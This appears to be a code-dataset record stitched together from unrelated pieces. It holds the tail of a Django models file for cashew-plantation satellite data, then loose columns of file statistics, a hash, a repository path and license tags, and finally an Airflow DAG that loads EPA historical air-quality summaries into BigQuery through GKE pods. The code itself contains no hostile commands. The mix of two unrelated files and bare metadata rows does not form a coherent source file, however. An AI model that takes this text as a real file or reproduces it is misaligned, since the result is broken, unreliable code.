def __str__(self):
return str(self.plantation_code)
class DeptSatellite(models.Model):
country = models.CharField(max_length=200)
department = models.CharField(max_length=200, unique=True)
cashew_tree_cover = models.FloatField(null=True)
def __str__(self):
return str(self.department)
class CommuneSatellite(models.Model):
country = models.CharField(max_length=200)
department = models.CharField(max_length=200)
commune = models.CharField(max_length=200, unique=True)
cashew_tree_cover = models.FloatField(null=True)
def __str__(self):
return str(self.commune)
class SpecialTuple(models.Model):
plantation_id = models.CharField(max_length=200, unique=True)
alteia_id = models.CharField(max_length=200, unique=True)
def __str__(self):
return str(self.alteia_id)
| 35.573733
| 154
| 0.688581
| 1,823
| 15,439
| 5.660998
| 0.095996
| 0.072384
| 0.127326
| 0.169767
| 0.868023
| 0.842539
| 0.807171
| 0.785756
| 0.753876
| 0.7375
| 0
| 0.027789
| 0.193536
| 15,439
| 434
| 155
| 35.573733
| 0.80106
| 0.228059
| 0
| 0.676976
| 0
| 0
| 0.054463
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041237
| false
| 0
| 0.013746
| 0.041237
| 0.756014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7736f0890813776e4a0f32517276ccef50836acf
| 104,403
|
py
|
Python
|
datasets/epa_historical_air_quality/pipelines/epa_historical_air_quality/epa_historical_air_quality_dag.py
|
arjunsgill/public-datasets-pipelines
|
45dd0b2c15821e38f0b7b511c253025fc7497ad0
|
[
"Apache-2.0"
] | null | null | null |
datasets/epa_historical_air_quality/pipelines/epa_historical_air_quality/epa_historical_air_quality_dag.py
|
arjunsgill/public-datasets-pipelines
|
45dd0b2c15821e38f0b7b511c253025fc7497ad0
|
[
"Apache-2.0"
] | null | null | null |
datasets/epa_historical_air_quality/pipelines/epa_historical_air_quality/epa_historical_air_quality_dag.py
|
arjunsgill/public-datasets-pipelines
|
45dd0b2c15821e38f0b7b511c253025fc7497ad0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.providers.google.cloud.operators import kubernetes_engine
default_args = {
"owner": "Google",
"depends_on_past": False,
"start_date": "2021-03-01",
}
with DAG(
dag_id="epa_historical_air_quality.epa_historical_air_quality",
default_args=default_args,
max_active_runs=1,
schedule_interval="0 1 * * 6",
catchup=False,
default_view="graph",
) as dag:
create_cluster = kubernetes_engine.GKECreateClusterOperator(
task_id="create_cluster",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
body={
"name": "epa-hist-air-quality",
"initial_node_count": 8,
"network": "{{ var.value.vpc_network }}",
"node_config": {
"machine_type": "e2-standard-16",
"oauth_scopes": [
"https://www.googleapis.com/auth/devstorage.read_write",
"https://www.googleapis.com/auth/cloud-platform",
],
},
},
)
# Run CSV transform within kubernetes pod
annual_summaries = kubernetes_engine.GKEStartPodOperator(
task_id="annual_summaries",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.annual_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.annual_summary.table_id }}",
"YEAR_FIELD_NAME": "year",
"YEAR_FIELD_TYPE": "INT",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.annual_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.annual_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.annual_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - annual_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "metric_used", "method_name", "year", "units_of_measure",\n "event_type", "observation_count", "observation_percent", "completeness_indicator", "valid_day_count",\n "required_day_count", "exceptional_data_count", "null_data_count", "primary_exceedance_count", "secondary_exceedance_count",\n "certification_indicator", "num_obs_below_mdl", "arithmetic_mean", "arithmetic_standard_dev", "first_max_value",\n "first_max_datetime", "second_max_value", "second_max_datetime", "third_max_value", "third_max_datetime",\n "fourth_max_value", "fourth_max_datetime", "first_max_non_overlapping_value", "first_no_max_datetime", "second_max_non_overlapping_value",\n "second_no_max_datetime", "ninety_nine_percentile", "ninety_eight_percentile", "ninety_five_percentile", "ninety_percentile",\n "seventy_five_percentile", "fifty_percentile", "ten_percentile", "local_site_name", "address",\n "state_name", "county_name", "city_name", "cbsa_name", "date_of_last_change"]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "metric_used": "str", "method_name": "str", "year": "int32", "units_of_measure": "str",\n "event_type": "str", "observation_count": "int32", "observation_percent": "float64", "completeness_indicator": "str", "valid_day_count": "int32",\n "required_day_count": "int32", "exceptional_data_count": "int32", "null_data_count": "int32", "primary_exceedance_count": "str", "secondary_exceedance_count": "str",\n "certification_indicator": "str", "num_obs_below_mdl": "int32", "arithmetic_mean": "float64", "arithmetic_standard_dev": "float64", "first_max_value": "float64",\n "first_max_datetime": "datetime64[ns]", "second_max_value": "float64", "second_max_datetime": "datetime64[ns]", "third_max_value": "float64", "third_max_datetime": "datetime64[ns]",\n "fourth_max_value": "float64", "fourth_max_datetime": "datetime64[ns]", "first_max_non_overlapping_value": "float64", "first_no_max_datetime": "datetime64[ns]", "second_max_non_overlapping_value": "float64",\n "second_no_max_datetime": "datetime64[ns]", "ninety_nine_percentile": "float64", "ninety_eight_percentile": "float64", "ninety_five_percentile": "float64", "ninety_percentile": "float64",\n "seventy_five_percentile": "float64", "fifty_percentile": "float64", "ten_percentile": "float64", "local_site_name": "str", "address": "str",\n "state_name": "str", "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "metric_used", "method_name", "year", "units_of_measure",\n "event_type", "observation_count", "observation_percent", "completeness_indicator", "valid_day_count",\n "required_day_count", "exceptional_data_count", "null_data_count", "primary_exceedance_count", "secondary_exceedance_count",\n "certification_indicator", "num_obs_below_mdl", "arithmetic_mean", "arithmetic_standard_dev", "first_max_value",\n "first_max_datetime", "second_max_value", "second_max_datetime", "third_max_value", "third_max_datetime",\n "fourth_max_value", "fourth_max_datetime", "first_max_non_overlapping_value", "first_no_max_datetime", "second_max_non_overlapping_value",\n "second_no_max_datetime", "ninety_nine_percentile", "ninety_eight_percentile", "ninety_five_percentile", "ninety_percentile",\n "seventy_five_percentile", "fifty_percentile", "ten_percentile", "local_site_name", "address",\n "state_name", "county_name", "city_name", "cbsa_name", "date_of_last_change"]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
co_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="co_daily_summary",
startup_timeout_seconds=600,
name="load_co_daily_summary",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.co_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.co_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.co_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.co_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.co_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - co_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "str", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
co_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="co_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.co_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.co_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.co_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.co_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.co_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - co_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code",\n "method_name", "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "str", "longitude": "str", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]", "time_local": "str",\n "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "str", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "str", "qualifier": "str", "method_type": "str", "method_code": "str",\n "method_name": "str", "state_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code",\n "method_name", "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
hap_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="hap_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.hap_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.hap_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.hap_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.hap_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.hap_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - hap_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
hap_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="hap_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.hap_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - hap_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
lead_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="lead_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.lead_daily_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.lead_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.lead_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.lead_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.lead_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - lead_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
no2_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="no2_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.no2_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.no2_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.no2_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.no2_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.no2_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - no2_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
no2_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="no2_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.no2_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - no2_hourly",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
nonoxnoy_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="nonoxnoy_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - nonoxnoy_daily",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
